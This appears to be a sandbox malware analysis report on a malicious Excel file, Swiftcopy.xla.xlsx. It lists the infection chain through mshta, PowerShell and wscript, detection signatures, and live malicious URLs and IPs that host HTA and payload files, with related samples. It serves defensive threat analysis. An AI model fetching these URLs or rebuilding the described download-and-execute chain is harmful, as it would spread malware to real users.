20->79 81 PowerShell case anomaly found 20->81 23 powershell.exe 24 20->23         started        process12 file13 41 seemebestthingswit...reatnaturething.vbS, Unicode 23->41 dropped 43 C:\Users\user\AppData\...\rpgvm2d4.cmdline, Unicode 23->43 dropped 83 Suspicious powershell command line found 23->83 85 Obfuscated command line found 23->85 87 Installs new ROOT certificates 23->87 27 wscript.exe 1 23->27         started        30 csc.exe 2 23->30         started        signatures14 process15 file16 89 Suspicious powershell command line found 27->89 91 Wscript starts Powershell (via cmd or directly) 27->91 93 Bypasses PowerShell execution policy 27->93 95 2 other signatures 27->95 33 powershell.exe 4 27->33         started        49 C:\Users\user\AppData\Local\...\rpgvm2d4.dll, PE32 30->49 dropped 36 cvtres.exe 30->36         started        signatures17 process18 signatures19 65 Suspicious powershell command line found 33->65 67 Obfuscated command line found 33->67 38 powershell.exe 12 4 33->38         started        process20 dnsIp21 53 ip.3105.filemail.com 193.30.119.205, 443, 49168 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 38->53 55 3105.filemail.com 38->55

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Swiftcopy.xla.xlsx15%VirustotalBrowse
      Swiftcopy.xla.xlsx16%ReversingLabs
      Swiftcopy.xla.xlsx100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://172.245.123.29/1343/erg/seemebestthings.htahttp://172.245.123.29/1343/erg/seemebestthings.hta0%Avira URL Cloudsafe
      http://crl.entrz0%Avira URL Cloudsafe
      http://172.245.123.29/1343/erg/seemebestthings.htas=drunk&kettledrum=flippant&0%Avira URL Cloudsafe
      http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFGf0%Avira URL Cloudsafe
      http://172.245.123.29/1343/erg/seemebestthings.hta0%Avira URL Cloudsafe
      http://172.245.123.29/1343/erg/seemebestthings.htarracks=drunk&kettledrum=flippant&banana=loose&bath0%Avira URL Cloudsafe
      https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom0%Avira URL Cloudsafe
      http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFp0%Avira URL Cloudsafe
      http://172.245.123.29/1343/erg/seemebestthings.hta...A0%Avira URL Cloudsafe
      http://172.245.123.29/1343/erg/seemebestthings.htab0%Avira URL Cloudsafe
      https://ljg.cl/P0%Avira URL Cloudsafe
      http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFHf0%Avira URL Cloudsafe
      http://172.245.123.29/0%Avira URL Cloudsafe
      https://ljg.cl/w0%Avira URL Cloudsafe
      http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF0%Avira URL Cloudsafe
      http://172.245.123.29/1343/seeme0%Avira URL Cloudsafe
      https://ljg.cl/ersiM0%Avira URL Cloudsafe
      https://ljg.cl/0%Avira URL Cloudsafe
      https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bat0%Avira URL Cloudsafe
      http://172.245.123.29/1343/erg/seemebestthings.htai0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ip.3105.filemail.com
      		193.30.119.205
      		truefalse
        		high
        ljg.cl
        		152.231.117.86
        		truefalse
          		high
          3105.filemail.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://172.245.123.29/1343/erg/seemebestthings.htatrue
            • Avira URL Cloud: safe
            		unknown
            https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroomfalse
            • Avira URL Cloud: safe
            		unknown
            http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFtrue
            • Avira URL Cloud: safe
            		unknown
            https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7cfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 0000000F.00000002.533779674.00000000025C3000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://172.245.123.29/1343/erg/seemebestthings.htahttp://172.245.123.29/1343/erg/seemebestthings.htamshta.exe, 00000004.00000003.500717687.0000000003515000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://crl.entrzpowershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net03mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://172.245.123.29/1343/erg/seemebestthings.htas=drunk&kettledrum=flippant&mshta.exe, 00000004.00000002.501048315.00000000003E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.00000000003E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFGfpowershell.exe, 00000008.00000002.528531884.000000001AA9E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://172.245.123.29/1343/erg/seemebestthings.htarracks=drunk&kettledrum=flippant&banana=loose&bathmshta.exe, 00000004.00000002.501048315.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501030236.000000000037E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://go.microspowershell.exe, 00000008.00000002.519013010.0000000002953000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFppowershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://172.245.123.29/1343/erg/seemebestthings.hta...Amshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://172.245.123.29/1343/erg/seemebestthings.htabmshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ljg.cl/Pmshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFHfpowershell.exe, 00000008.00000002.528531884.000000001AA9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://172.245.123.29/mshta.exe, 00000004.00000003.500943602.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.0000000004433000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ljg.cl/wmshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://172.245.123.29/1343/seemepowershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ljg.cl/ersiMmshta.exe, 00000004.00000002.501048315.0000000000423000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ljg.cl/mshta.exe, 00000004.00000002.501048315.0000000000423000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&batmshta.exe, 00000004.00000002.501048315.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.000000000040B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501030236.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, Swiftcopy.xla.xlsx, 73B30000.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.519013010.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.538964399.000000000240B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.533779674.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://go.crpowershell.exe, 0000000F.00000002.536446147.000000001AC84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://172.245.123.29/1343/erg/seemebestthings.htaimshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://3105.filemail.compowershell.exe, 0000000F.00000002.533779674.00000000025C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  193.30.119.205
                                                  		ip.3105.filemail.comunknown
                                                  		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                  172.245.123.29
                                                  		unknownUnited States
                                                  		36352AS-COLOCROSSINGUStrue
                                                  152.231.117.86
                                                  		ljg.clChile
                                                  		27651ENTELCHILESACLfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1564317
                                                  Start date and time:2024-11-28 07:26:09 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 51s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Number of analysed new started processes analysed:18
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • GSI enabled (VBA)
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Swiftcopy.xla.xlsx
                                                  Detection:MAL
                                                  Classification:mal100.phis.expl.evad.winXLSX@16/29@6/3
                                                  EGA Information:
                                                  • Successful, ratio: 33.3%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 22
                                                  • Number of non-executed functions: 1
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .xlsx
                                                  • Changed system and user locale, location and keyboard layout to French - France
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Active ActiveX Object
                                                  • Active ActiveX Object
                                                  • Scroll down
                                                  • Close Viewer

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                  • Execution Graph export aborted for target mshta.exe, PID 3948 because there are no executed function
                                                  • Execution Graph export aborted for target powershell.exe, PID 2036 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  01:28:04API Interceptor97x Sleep call for process: mshta.exe modified
                                                  01:28:11API Interceptor161x Sleep call for process: powershell.exe modified
                                                  01:28:20API Interceptor15x Sleep call for process: wscript.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  193.30.119.205greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                    Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                      26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                        List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                          Inquiry.jsGet hashmaliciousUnknownBrowse
                                                            Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                              creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ip.3105.filemail.comgreatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Inquiry.jsGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 193.30.119.205
                                                                      ljg.clOrder Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      Payment Advice.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ENTELCHILESACLarm.elfGet hashmaliciousMiraiBrowse
                                                                      • 164.77.128.117
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      Payment Advice.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.102.107
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.102.107
                                                                      jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                                                      • 11.100.2.34
                                                                      akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                      • 11.120.114.146
                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 11.113.3.48
                                                                      DFNVereinzurFoerderungeinesDeutschenForschungsnetzesegreatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      m68k.elfGet hashmaliciousUnknownBrowse
                                                                      • 141.89.70.14
                                                                      powerpc.elfGet hashmaliciousUnknownBrowse
                                                                      • 134.28.103.153
                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 139.20.77.10
                                                                      jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                                                      • 137.250.32.211
                                                                      https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/Get hashmaliciousUnknownBrowse
                                                                      • 141.95.124.137
                                                                      Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Inquiry.jsGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      AS-COLOCROSSINGUSgreatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                      • 23.95.128.215
                                                                      niceidea.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                      • 192.3.95.197
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 104.168.46.26
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 104.168.46.26
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 104.168.46.26
                                                                      container payment.xlsGet hashmaliciousUnknownBrowse
                                                                      • 107.175.113.196
                                                                      Payment Advice.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 192.3.95.197
                                                                      Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                      • 23.95.128.215
                                                                      26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 23.95.128.215
                                                                      container payment.xlsGet hashmaliciousUnknownBrowse
                                                                      • 107.175.113.196

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      05af1f5ca1b87cc9cc9b25185115607dPedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Document.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 193.30.119.205
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      gr5zS9wytq.batGet hashmaliciousUnknownBrowse
                                                                      • 193.30.119.205
                                                                      FHG538JGH835DG86S.docGet hashmaliciousDarkTortilla, XWormBrowse
                                                                      • 193.30.119.205
                                                                      New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 193.30.119.205
                                                                      7dcce5b76c8b17472d024758970a406bOrder Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.117.86
                                                                      Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.117.86
                                                                      container payment.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.117.86
                                                                      Payment Advice.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.117.86
                                                                      Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.117.86
                                                                      26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.117.86
                                                                      container payment.xlsGet hashmaliciousUnknownBrowse
                                                                      • 152.231.117.86
                                                                      List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.117.86
                                                                      Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 152.231.117.86
                                                                      New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                      • 152.231.117.86

